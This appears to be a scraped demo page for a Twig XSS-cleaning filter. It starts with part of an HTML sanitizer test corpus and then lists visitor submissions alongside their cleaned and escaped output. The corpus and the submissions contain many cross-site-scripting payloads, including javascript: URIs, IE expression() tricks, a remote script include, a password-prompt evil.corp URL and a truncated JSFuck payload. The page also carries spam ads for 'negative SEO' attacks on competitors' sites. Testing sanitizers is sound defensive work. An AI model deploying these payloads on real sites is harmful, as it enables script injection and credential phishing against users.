/>\\r\\n<p><ins><del>d</del></ins></p><div><ins><p><del><div>d</div></del></p></ins></div><ins><div>d</div></ins>\\r\\n\\r\\n<h6>Lists</h6>\\r\\n\\r\\n<strong>Invalid character data</strong>: <ul><li>(item</li>)</ul><br />\\r\\n<strong>Definition list</strong>: <dl><dt>a</dt>bad<dd>first <em>one</em></dd><dt>b</dt><dd>second</dd></dl><br />\\r\\n<strong>Definition list, close-tags omitted</strong>: <dl><dt>a</dt>bad<dd>first <em>one</em></dd><dt>b<dd>second</dl><br />\\r\\n<strong>Definition lists, nested</strong>: <dl>\\r\\n <dt>T1</dt>\\r\\n <dd>D1</dd>\\r\\n <dt>T2</dt>\\r\\n <dd>D2<dl><dt>t1</dt><dd>d1</dd><dt>t2</dt><dd>d2</dd></dl></dd>\\r\\n <dt>T3</dt>\\r\\n <dd>D3</dd>\\r\\n <dt>T4</dt>\\r\\n <dd>D4<dl><dt>t1</dt><dd>d1</dd></dl></dd>\\r\\n</dl><br />\\r\\n<strong>Definition lists, nested, close-tags omitted</strong>: <dl>\\r\\n <dt>T1\\r\\n <dd>D1</dd>\\r\\n <dt>T2</dt>\\r\\n <dd>D2<dl><dt>t1<dd>d1<dt>t2</dt><dd>d2</dd></dl></dd>\\r\\n <dt>T3\\r\\n <dd>D3\\r\\n <dt>T4\\r\\n <dd>D4<dl><dt>t1<dd>d1</dl></dd>\\r\\n</dl><br />\\r\\n<strong>Nested</strong>: <ul>\\r\\n <li>l1</li>\\r\\n <li>l2<ol><li>lo1</li><li>lo2</li></ol></li>\\r\\n <li>l3</li>\\r\\n <li>l4<ol><li>lo3</li><li>lo4<ol><li>lo5</li></ol></li></ol></li>\\r\\n</ul><br />\\r\\n<strong>Nested, directly</strong>: <ul>\\r\\n <li>l1</li>\\r\\n <ol>l2</ol>\\r\\n <li>l3</li>\\r\\n</ul><br />\\r\\n<strong>Nested, close-tags omitted</strong>: <ul>\\r\\n <li>l1</li>\\r\\n <li>l2<ol><li>lo1<li>lo2</ol>\\r\\n <li>l3\\r\\n <li>l4<ol><li>lo3<li>lo4<ol><li>lo5</ol></ol>\\r\\n</ul><br />\\r\\n<strong>Complex</strong>:\\r\\n<ol><script></script><li><table><tr><td>\\r\\n<ul><li id=\\\"search\\\" class=\\\"widget widget_search\\\"> <form id=\\\"searchform\\\" method=\\\"get\\\" action=\\\"http://kohei.us\\\">\\r\\n <div>\\r\\n\\r\\n <input type=\\\"text\\\" name=\\\"s\\\" id=\\\"s\\\" size=\\\"15\\\" /><br />\\r\\n <input type=\\\"submit\\\" value=\\\"Search\\\" />\\r\\n </div>\\r\\n </form>\\r\\n </li></ul>\\r\\n</td></tr></table></li></ol>\\r\\n<strong>Menu</strong>: <menu type=\\\"toolbar\\\"><li><menu label=\\\"File\\\">\\r\\n <button type=\\\"button\\\" onclick=\\\"new()\\\">New...</button>\\r\\n </menu></li><li><menu label=\\\"Edit\\\"><button type=\\\"button\\\" onclick=\\\"cut()\\\">Cut...</button></menu></li>\\r\\n </menu>\\r\\n\\r\\n<h6>Microdata</h6>\\r\\n\\r\\n<div itemscope itemtype=\\\"http://data-vocabulary.org/Person\\\"> \\r\\nI am <span itemprop=\\\"name\\\">X</span> but people call me <span itemprop=\\\"nickname\\\">Y</span>. \\r\\nFind me at <a href=\\\"http://www.xy.com\\\" itemprop=\\\"url\\\">www.xy.com</a>\\r\\n</div>\\r\\n\\r\\n<h6>Microsoft Word</h6>\\r\\n\\r\\n<strong>Proprietary tag</strong>: <p class=3DMsoNormal><o:p>&nbsp;</o:p></p><br />\\r\\n<strong>XML declaration</strong>: <?xml:namespace prefix = o ns = \\\"urn:schemas-microsoft-com:office:office\\\" /><br />\\r\\n<strong>XML-invalid character code-point (may not replicate)</strong>: <p class=3DMsoNormal>“Where is he?” asked both Mary – the one so lovely – and Jane.</p>\\r\\n\\r\\n<h6>Nesting</h6>\\r\\n\\r\\n<strong>Block or inline a</strong>: <p><a href=\\\"link\\\">text</a></p><a href=\\\"link\\\"><div>hi</div></a><br />\\r\\n\\r\\n<h6>Non-English text-1</h6>\\r\\n\\r\\nInscrieÅ£i-vă acum la a Zecea Conferinţă InternaÅ£ională<br />\\r\\nგთხოვთ ახლავე გაიაროთ რეგისტრაცია<br />\\r\\nvečjezično računalništvo<br />\\r\\n<a title=\\\"อ.อ่าง\\\">อ.อ่าง</a><br />\\r\\n<a title=\\\"הירשמו\\r\\nכעת ×œ×›× ×¡ \\\">Зарегистрируйтесь сейчас\\r\\nна Десятую Международную Конференцию по</a><br />\\r\\n(this file should have utf-8 encoding; some characters may not be displayed because of missing fonts, etc.)\\r\\n\\r\\n<h6>Non-English text-2: entities</h6>\\r\\n\\r\\n&#29992;&#32479;&#19968;&#30721;<br />\\r\\n&#4306;&#4311;&#4334;&#4317;&#4309;&#4311;<br />\\r\\nInscreva-se agora para a D&#233;cima Confer&#234;ncia Internacional Sobre O Unicode, realizada entre os dias 10 e 12 de mar&#231;o de 1997 em Mainz\\r\\nna Alemanha.\\r\\n\\r\\n<h6>Ruby</h6>\\r\\n\\r\\n(need compatible browser)<br />\\r\\n<ruby xml:lang=\\\"ja\\\">\\r\\n <rbc>\\r\\n <rb>æ–Ž</rb>\\r\\n <rb>è—¤</rb>\\r\\n <rb>ä¿¡</rb>\\r\\n <rb>ç”·</rb>\\r\\n </rbc>\\r\\n <rtc class=\\\"reading\\\">\\r\\n <rt>さい</rt>\\r\\n <rt>とう</rt>\\r\\n <rt>のぶ</rt>\\r\\n <rt>お</rt>\\r\\n </rtc>\\r\\n <rtc class=\\\"annotation\\\">\\r\\n <rt rbspan=\\\"4\\\" xml:lang=\\\"en\\\">W3C Associate Chairman</rt>\\r\\n </rtc>\\r\\n</ruby><br />\\r\\n<ruby>\\r\\n <rb>WWW</rb>\\r\\n <rp>(</rp><rt>World Wide Web</rt><rp>)</rp>\\r\\n</ruby><br />\\r\\n<ruby>\\r\\n A\\r\\n <rp>(</rp><rt>aaa</rt><rp>)</rp>\\r\\n</ruby>\\r\\n\\r\\n\\r\\n<h6>Tables</h6>\\r\\n\\r\\n<strong>Omitted closing tags:</strong> <table>\\r\\n<colgroup><col style=\\\"x\\\" /><col style=\\\"y\\\" />\\r\\n<thead>\\r\\n<tr><th>h1c1<th>h1c2\\r\\n<tbody>\\r\\n<tr><td>r1c1<td>r1c2\\r\\n<tr><td>r2c1<td>r2c2\\r\\n</table><br />\\r\\n<strong>Nested, omitted closing tags:</strong> <table>\\r\\n<colgroup><col style=\\\"x\\\" /><col style=\\\"y\\\" />\\r\\n<thead>\\r\\n<tr><th>h1c1<th>h1c2\\r\\n<tbody>\\r\\n<tr><td>r1c1<td>r1c2<table>\\r\\n<colgroup><col style=\\\"x\\\" /><col style=\\\"y\\\" />\\r\\n<thead>\\r\\n<tr><th>h1c1<th>h1c2\\r\\n<tbody>\\r\\n<tr><td>r1c1<td>r1c2\\r\\n<tr><td>r2c1<td>r2c2\\r\\n</table>\\r\\n<tr><td>r2c1<td>r2c2\\r\\n</table><br />\\r\\n\\r\\n<h6>Tag transformation</h6>\\r\\n<strong>Font element with malicious code:</strong> <p><font color=\\\"z-index:123;width:100%;height:100%;position:fixed;top:0;left:0;background-size:cover;background-attachment:fixed;background-image:url(https://i.imgur.com/VQ30s65.png)\\\"></font></p><br />\\r\\n<strong>Font element intended as \\\'inline\\\' element:</strong> <p><font color=\\\'red\\\'>hi</font></p><br />\\r\\n<strong>Font element intended as \\\'block\\\' element:</strong> <div><font color=\\\'red\\\'><div>hi</div></font></div><br />\\r\\n<strong>Font element intended as \\\'block\\\' element:</strong> <center><font color=\\\'red\\\' face=\\\"serif, \\\'Times\\\'\\\"><div>hi</div><div>QQQ</div></font></center><br />\\r\\n\\r\\n<h6>Tidy</h6>\\r\\n<strong>White-space handling:</strong> abc<em> def </em> ghi abc <em>def</em> ghi\\r\\n\\r\\n<h6>URLs</h6>\\r\\n\\r\\n<strong>Relative and absolute:</strong> <a href=\\\"mailto:x\\\"></a>, <a href=\\\"http://a.com/b/c/d.f\\\"></a>, <a href=\\\"./../d.f\\\"></a>, <a href=\\\"./d.f\\\"></a>, <a href=\\\"d.f\\\"></a>, <a href=\\\"#s\\\"></a>, <a href=\\\"./../../d.f#s\\\"></a><br />\\r\\n(try base URL value of \\\'http://a.com/b/\\\')<br />\\r\\n<strong>CSS URLs:</strong> <div style=\\\"background-image: url(\\\'a.gif\\\');\\\"></div>, <div style=\\\"background-image: URL(&quot;a.gif&quot;);\\\"></div>, <div style=\\\"background-image: url(\\\'http://a.com/a.gif\\\');\\\"></div>, <div style=\\\"background-image: url(\\\'./../a.gif\\\');\\\"></div>, <div style=\\\"background-image: &#117;r&#x6C;(\\\'js&#58;xss\\\'&#x29;\\\"></div><br />\\r\\n<strong>Double URLs:</strong> <a style=\\\"behaviour: url(foo) url(http://example.com/xss.htc)\\\">b</a><br />\\r\\n<strong>Anti-spam:</strong> (try regex for \\\'http://a.com\\\', etc.) <a href=\\\"mailto:x@y.com\\\"></a>, <a href=\\\"http://a.com/b@d.f\\\"></a>, <a href=\\\"a.com/d.f\\\" rel=\\\"nofollow\\\"></a>, <a href=\\\"a.com/d.f\\\" rel=\\\"1, 2\\\"></a>, <a href=\\\"a.com/d.f\\\"></a>, <a href=\\\"b.com/d.f\\\"></a>, <a href=\\\"c.com/d.f\\\">, <a href=\\\"denied:http://c.com/d.f\\\"></a><br />\\r\\n<strong>Soft-hyphen:</strong> <a href=\\\"http://q=ídis­c\\\">ídis­c</a>\\r\\n\\r\\n<h6>XSS</h6>\\r\\n\\r\\n<img alt=\\\"<img onmouseover=confirm(1)//\\\"<\\\"\\\">\\r\\n\\\'\\\';!--\\\"<xss>=&{()}<br />\\r\\n<img src=\\\"javascript%3Aalert(\\\'xss\\\');\\\" /><br />\\r\\n<img src=\\\"javascript:alert(\\\'xss\\\');\\\" /><br />\\r\\n<img src=\\\"java script:alert(\\\'xss\\\');\\\" /><br />\\r\\n<img\\r\\nsrc=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41; /><br />\\r\\n<font color=\\\'#FF6699\\\"onmouseover=\\\"alert(1)//\\\'>test</font>\\r\\n<font color=\\\'<img//onerror=\\\"alert`www.ptsecurity.com`\\\"src=Psych0tr1a\\\'>\\r\\n<div style=\\\"javascript:alert(\\\'xss\\\');\\\"></div><br />\\r\\n<div style=\\\"background-image:url(javascript:alert(\\\'xss\\\'));\\\"></div><br />\\r\\n<div style=\\\"background-image:url(&quot;javascript:alert(\\\'xss\\\')&quot; );\\\"></div><br />\\r\\n<!--[if gte IE 4]><script>alert(\\\'xss\\\');</script><![endif]--><br />\\r\\n<script a=\\\">\\\" src=\\\"http://ha.ckers.org/xss.js\\\"></script><br />\\r\\n<div style=\\\"background-image: &#117;r&#x6C;(\\\'js&#58;xss\\\'&#x29;\\\"></div><br />\\r\\n<a style=\\\";-moz-binding:url(http://lukasz.pilorz.net/xss/xss.xml#xss)\\\" href=\\\"http://example.com\\\">test</a><br />\\r\\n<strong>Bad IE7:</strong> <a href=\\\"http://x&x=%22+style%3d%22background-image%3a+expression%28alert\\r\\n%28%27xss%3f%29%29\\\">x</a><br />\\r\\n<strong>Opera:</strong> <a href=\\\"\\\\xE2\\\\x80\\\\x83javascript:alert(123)\\\">link</a>\\r\\n<strong>Bad IE7:</strong> <a style=color:expr/*comment*/ession(alert(document.domain))>xxx</a><br />\\r\\n<strong>Bad IE7:</strong> <a href=\\\"xxx\\\" style=\\\"background: exp&#x72;ession(alert(\\\'xss\\\'));\\\">xxx</a><br />\\r\\n<strong>Bad IE7:</strong> <a href=\\\"xxx\\\" style=\\\"background: &#101;xpression(alert(\\\'xss\\\'));\\\">xxx</a><br />\\r\\n<strong>Bad IE7:</strong> <a href=\\\"xxx\\\" style=\\\"background: %45xpression(alert(\\\'xss\\\'));\\\">xxx</a><br />\\r\\n<strong>Bad IE7:</strong> <a href=\\\"xxx\\\" style=\\\"background:/**/expression(alert(\\\'xss\\\'));\\\">xxx</a><br />\\r\\n<strong>Bad IE7:</strong> <a href=\\\"xxx\\\" style=\\\"background:/**/&#69;xpression(alert(\\\'xss\\\'));\\\">xxx</a><br />\\r\\n<strong>Bad IE7:</strong> <a href=\\\"xxx\\\" style=\\\"background:/**/Exp&#x72;ession(alert(\\\'xss\\\'));\\\">xxx</a><br />\\r\\n<strong>Bad IE7:</strong> <a href=\\\"xxx\\\" style=\\\"background: expr%45ssion(alert(\\\'xss\\\'));\\\">xxx</a><br />\\r\\n<strong>Bad IE7:</strong> <a href=\\\"xxx\\\" style=\\\"background: exp/* */ression(alert(\\\'xss\\\'));\\\">xxx</a><br />\\r\\n<strong>Bad IE7:</strong> <a href=\\\"xxx\\\" style=\\\"background: exp /* */ression(alert(\\\'xss\\\'));\\\">xxx</a><br />\\r\\n<strong>Bad IE7:</strong> <a href=\\\"xxx\\\" style=\\\"background: exp/ * * /ression(alert(\\\'xss\\\'));\\\">xxx</a><br />\\r\\n<strong>Bad IE7:</strong> <a href=\\\"xxx\\\" style=\\\"background:/* x */expression(alert(\\\'xss\\\'));\\\">xxx</a><br />\\r\\n<strong>Bad IE7:</strong> <a href=\\\"xxx\\\" style=\\\"background:/* */ */expression(alert(\\\'xss\\\'));\\\">xxx</a><br />\\r\\n<strong>Bad IE7:</strong> <a href=\\\"x\\\" style=\\\"width: /****/**;;;;;;*/expression/**/(alert(\\\'xss\\\'));\\\">x</a><br />\\r\\n<strong>Bad IE7:</strong> <a href=\\\"x\\\" style=\\\"padding:10px; background:/**/expression(alert(\\\'xss\\\'));\\\">x</a><br />\\r\\n<strong>Bad IE7:</strong> <a href=\\\"x\\\" style=\\\"background: huh /* */ */expression(alert(\\\'xss\\\'));\\\">x</a><br />\\r\\n<strong>Bad IE7:</strong> <a href=\\\"x\\\" style=\\\"background:/**/expression(alert(\\\'xss\\\'));background:/**/expression(alert(\\\'xss\\\'));\\\">x</a><br />\\r\\n<strong>Bad IE7:</strong> exp/*<a style=\\\'no\\\\xss:noxss(\\\"*//*\\\");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert(\\\"XSS\\\"))\\\'>x</a><br />\\r\\n<strong>Bad IE7:</strong> <a style=\\\"background:&#69;xpre\\\\ssion(alert(\\\'xss\\\'));\\\">hi</a><br />\\r\\n<strong>Bad IE7:</strong> <a style=\\\"background:expre&#x5c;ssion(alert(\\\'xss\\\'));\\\">hi</a><br />\\r\\n<strong>Bad IE7:</strong> <a style=\\\"color: \\\\0065 \\\\0078 \\\\0070 \\\\0072 \\\\0065 \\\\0073 \\\\0073 \\\\0069 \\\\006f \\\\006e \\\\0028 \\\\0061 \\\\006c \\\\0065 \\\\0072 \\\\0074 \\\\0028 \\\\0031 \\\\0029 \\\\0029\\\">test</a><br />\\r\\n<strong>Bad IE7:</strong> <a style=\\\"xss:e&#92;&#48;&#48;&#55;&#56;pression(window.x?0:(alert(/XSS/),window.x=1));\\\">hi</a><br />\\r\\n<strong>Bad IE7:</strong> <a style=\\\"background:url(\\\'java\\r\\nscript:eval(document.all.mycode.expr)\\\')\\\">hi</a><br />\\r\\n\\r\\n<h6>Other</h6>\\r\\n\\r\\n3 < 4 <br />\\r\\n3 > 4 <br />\\r\\n > 3 <br />\\r\\n<._.> hi! <br />\\r\\n<<< ALERT >>> <br />\\r\\n<![if !vml]> some stuff <![endif]> <br />\\r\\n<?xml:namespace prefix = o ns = \\\"urn:schemas-microsoft-com:office:office\\\" /> <br />\\r\\n<uml:ns ns = \\\"urn:www\\\"> <br />\\r\\n<uml:ns ns = \\\'urn:www\\\'> <br />\\r\\nif(13<age AND 21>age){say \\\'teen\\\'} <br />\\r\\nage >51 and a smoking history of >51 pack-years <b>was</b> <br />\\r\\nage > 51 and a smoking history of >51 pack-years <b>was</b> <br />\\r\\nage <51 and a smoking history of <51 pack-years <b>was</b> <br />\\r\\nage < 51 and a smoking history of < 51 pack-years <b>was</b> <br />\\r\\n<b>age >51 and a smoking history of >51 pack-years</b> <br />\\r\\n<b>age > 51 and a smoking history of >51 pack-years</b> <br />\\r\\n<b>age <51 and a smoking history of <51 pack-years</b> <br />\\r\\n<b>age < 51 and a smoking history of < 51 pack-years</b> <br />\\r\\n

keyword(s): 3

description:

by 2 | at 2022-06-15 05:12:51


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script></script>

keyword(s): 2

description:

by 1 | at 2022-06-15 05:12:17


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

, ,

result with twig: {{ xss.xss | escape }}:

</strong><a lang=\\\"en\\\" xml:lang=\\\"en\\\"></a>, <a lang=\\\"en\\\"></a>, <a xml:lang=\\\"en\\\"></a><br />

keyword(s): s

description: s

by s | at 2022-06-11 00:37:14


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

fdgfdg

result with twig: {{ xss.xss | escape }}:

fdgfdg

keyword(s): dfg

description: fdg

by fdg | at 2022-06-10 08:37:53


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

<link rel=\\\"import\\\" href=\\\"test.svg\\\" />//[\\\"\\\'`-->]]>]
<iframe srcdoc=\\\"\\\" />//[\\\"\\\'`-->]]>]
undefined

result with twig: {{ xss.xss | escape }}:

<div id=\\\"138\\\"><link rel=\\\"import\\\" href=\\\"test.svg\\\" />//[\\\"\\\'`-->]]>]</div><div id=\\\"139\\\"><iframe srcdoc=\\\"<img >\\\" />//[\\\"\\\'`-->]]>]</div>undefined

keyword(s): <% foo><x foo=

description: <% foo><x foo=\\\"%>\\\">//[\\\"\\\'`-->]]>]</div>\\r\\n\\r\\n

by <% foo><x foo= | at 2022-06-10 06:21:31


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

xdsadsa

result with twig: {{ xss.xss | escape }}:

xdsadsa

keyword(s): aaa

description: aaa

by aaa | at 2022-06-09 19:02:07


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

http://www.evil.corp/xss_fixed_ent.php?username=\\\\&action=;prompt(([]+/Bitte Passwort eingeben/g).substr(1,23));//

result with twig: {{ xss.xss | escape }}:

http://www.evil.corp/xss_fixed_ent.php?username=\\\\&action=;prompt(([]%2B/Bitte%20Passwort%20eingeben/g).substr(1,23));//

keyword(s):

description:

by Test | at 2022-06-07 15:37:49


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

http://www.evil.corp/xss.php?username=test">

result with twig: {{ xss.xss | escape }}:

http://www.evil.corp/xss.php?username=test%22%3E%3Cscript%3Eprompt(%22Bitte%20Passwort%20eingeben%22)%3C/script%3E

keyword(s):

description:

by Test | at 2022-06-07 15:31:00


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<scr <script> ipt> alealertrt (11) </ scr </ script> ipt>

keyword(s):

description:

by Test | at 2022-06-07 15:27:03


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<scr <script> ipt> alealertrt () </ scr </ script> ipt>

keyword(s):

description:

by Test | at 2022-06-07 15:24:42


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

div class=\\\"container mb5\\\">\\r\\n\\r\\n
\\r\\n\\r\\n

result with twig: {{ xss.xss | escape }}:

div class=\\\"container mb5\\\">\\r\\n\\r\\n <div class=\\\"row\\\">\\r\\n\\r\\n <div class=\\\"col mb-5 text-center\\\">

keyword(s):

description:

by test | at 2022-06-06 19:09:58


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

[alert(1])]

result with twig: {{ xss.xss | escape }}:

[alert(1])]

keyword(s):

description:

by test | at 2022-06-06 19:09:27


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Приветствуем вас! \\r\\nМожем предложить лучшие прогоны, способные \\\"угробить\\\" сайт конкурентов. Стоимость: от 2000 р. \\r\\n- Стопроцентный эффект. Интернет-сайты точно \\\"упадут\\\". \\r\\n- Наибольшее количество отрицательных фитбеков. \\r\\n- Наша специальная база - самые \\\"убийственные\\\" площадки из 10 000 000 ресурсов (вирусных, спамных, порно и многие другие). Это действует бесперебойно. \\r\\n- Прогон производим одновременно с 4 мощных серверов. \\r\\n- Непрерывная отправка токсичных ссылок на e-mail. \\r\\n- Растянем как угодно по времени. \\r\\n- Прогоняем с запретными ключами. \\r\\nTelgrm: @exrumer \\r\\nSkype: xrumer.pro \\r\\nWhatsApp: +7(977)536-08-36 \\r\\nicq: 5688885 \\r\\nТолько Эти!

result with twig: {{ xss.xss | escape }}:

Приветствуем вас! \\r\\nМожем предложить лучшие прогоны, способные \\\"угробить\\\" сайт конкурентов. Стоимость: от 2000 р. \\r\\n- Стопроцентный эффект. Интернет-сайты точно \\\"упадут\\\". \\r\\n- Наибольшее количество отрицательных фитбеков. \\r\\n- Наша специальная база - самые \\\"убийственные\\\" площадки из 10 000 000 ресурсов (вирусных, спамных, порно и многие другие). Это действует бесперебойно. \\r\\n- Прогон производим одновременно с 4 мощных серверов. \\r\\n- Непрерывная отправка токсичных ссылок на e-mail. \\r\\n- Растянем как угодно по времени. \\r\\n- Прогоняем с запретными ключами. \\r\\nTelgrm: @exrumer \\r\\nSkype: xrumer.pro \\r\\nWhatsApp: +7(977)536-08-36 \\r\\nicq: 5688885 \\r\\nТолько Эти!

keyword(s):

description: Добрый вечер! \\r\\nСоветуем самые лучшие \\\"смертельные\\\" прогоны для сайтов конкурентов. Стоимость: от 2 000 р. \\r\\n- Гарантированный эффект. Сайты ваших конкурентов \\\"упадут\\\". \\r\\n- Максимальное число отрицательных фитбеков. \\r\\n- Собрана специальная база - самые \\\"смертельные\\\" площадки из 10 млн. веб-сайтов (порно, вирусных, спамных и многие другие). Действует безотказно. \\r\\n- Прогон производим одновременно с 4 мощных серверов. \\r\\n- Отправка вирусных ссылок на официальный e-mail. \\r\\n- Можем растянуть по времени как угодно. \\r\\n- Прогоняем с запрещёнными ключами. \\r\\nТелега: @exrumer \\r\\nSkype: xrumer.pro \\r\\nWhatsApp: +7(977)536-08-36 \\r\\nicq: 5688885 \\r\\nТолько Эти!

by Nigel Burden | at 2022-06-05 14:25:58


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

\\r\\n\\r\\n

result with twig: {{ xss.xss | escape }}:

<div t=\\\"\\\' \\\'ff.html\\\'\\\">\\r\\n<SCRIPT var test =123 ; </script>\\r\\n</div>

keyword(s):

description:

by Test | at 2022-06-03 11:28:06


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Hi\\r\\n\\r\\nIf you ever need Negative SEO or a de-rank strategy, you can hire us here\\r\\n\\r\\nhttps://www.speed-seo.net/product/negative-seo-service/\\r\\nhttps://www.speed-seo.net/product/derank-seo-service/\\r\\n\\r\\n\\r\\n

result with twig: {{ xss.xss | escape }}:

Hi\\r\\n\\r\\nIf you ever need Negative SEO or a de-rank strategy, you can hire us here\\r\\n\\r\\nhttps://www.speed-seo.net/product/negative-seo-service/\\r\\nhttps://www.speed-seo.net/product/derank-seo-service/\\r\\n\\r\\n\\r\\n

keyword(s):

description: Hi\\r\\n\\r\\nIf you ever need Negative SEO or a de-rank strategy, you can hire us here\\r\\n\\r\\nhttps://www.speed-seo.net/product/negative-seo-service/\\r\\nhttps://www.speed-seo.net/product/derank-seo-service/\\r\\n\\r\\n\\r\\n

by Daisy Schindler | at 2022-06-02 00:31:38


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

<meta test-seo=\\\"robots\\\" name=\\\"robots\\\" content=\\\"\\\">

result with twig: {{ xss.xss | escape }}:

<meta test-seo=\\\"robots\\\" name=\\\"robots\\\" content=\\\"\\\">

keyword(s):

description:

by test | at 2022-06-01 11:08:53


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<img img=\\\"img\\\" onerror=\\\"alert(1)\\\"> → <img />

keyword(s):

description:

by test | at 2022-06-01 10:54:53


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Hello\\r\\n

result with twig: {{ xss.xss | escape }}:

<a href=\\\"j&#x26;#x41;vascript:alert%252831337%2529\\\">Hello</a>\\r\\n

keyword(s):

description:

by test | at 2022-06-01 10:49:41


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>var e = test; console.log(e);</script>

keyword(s):

description:

by test | at 2022-06-01 10:48:35


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

(1)

result with twig: {{ xss.xss | escape }}:

javascript:alert(1)

keyword(s):

description:

by test | at 2022-06-01 10:46:59


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>alert(\\\\\\\\\\\\\\\'olá\\\\\\\\\\\\\\\')</script>

keyword(s):

description:

by oi | at 2022-06-01 10:45:43


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

oi

result with twig: {{ xss.xss | escape }}:

<script>alert(\\\'olá\\\')</script> oi

keyword(s): a

description: b

by a | at 2022-06-01 07:06:36


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>alert(\\\"2\\\")</script>

keyword(s): asdasd

description: asdasdasd

by asdas | at 2022-06-01 06:28:15


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>alert(\\\\\\\\\\\\\\\"test\\\\\\\\\\\\\\\")</script>

keyword(s):

description:

by | at 2022-06-01 05:42:50


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>alert(\\\"test\\\")</script>

keyword(s):

description:

by j | at 2022-05-31 20:38:05


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

j

result with twig: {{ xss.xss | escape }}:

j

keyword(s):

description:

by | at 2022-05-31 20:37:45


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+!+[]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+